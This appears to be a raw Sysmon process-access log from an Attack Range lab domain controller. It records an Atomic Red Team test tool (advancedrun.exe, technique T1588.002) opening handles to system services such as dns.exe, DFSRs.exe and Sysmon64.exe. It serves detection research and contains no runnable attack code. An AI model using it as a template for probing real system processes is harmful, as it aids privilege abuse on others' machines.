17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 